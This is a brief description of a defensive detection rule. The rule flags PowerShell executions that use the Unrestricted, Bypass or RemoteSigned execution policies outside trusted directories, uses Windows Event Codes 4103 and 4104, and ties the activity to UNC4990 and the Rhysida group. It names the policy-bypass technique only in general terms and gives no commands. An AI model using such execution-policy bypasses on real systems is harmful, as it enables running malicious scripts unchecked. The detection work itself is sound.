This detection rule focuses on identifying PowerShell executions that are triggered with potentially unsafe execution policies like Unrestricted, Bypass, or RemoteSigned. These settings can be manipulated by malicious actors to run harmful scripts or commands on a system without the usual restrictions and signature requirements, increasing the risk of cyber incidents. The rule uses specific Windows Event Codes 4103 and 4104, which correlate with PowerShell operations, to filter for execution instances where these policies are specified. Additionally, the logic ensures that it only captures instances outside of trusted directories, likely indicating malicious intent. By tracking such activities, analysts can uncover potential exploitations that threat actors, such as UNC4990 (associated with the Rhysida group), are utilizing to execute their operations undetected. This enhances the detection capabilities of security teams against scripting-related attacks leveraging PowerShell.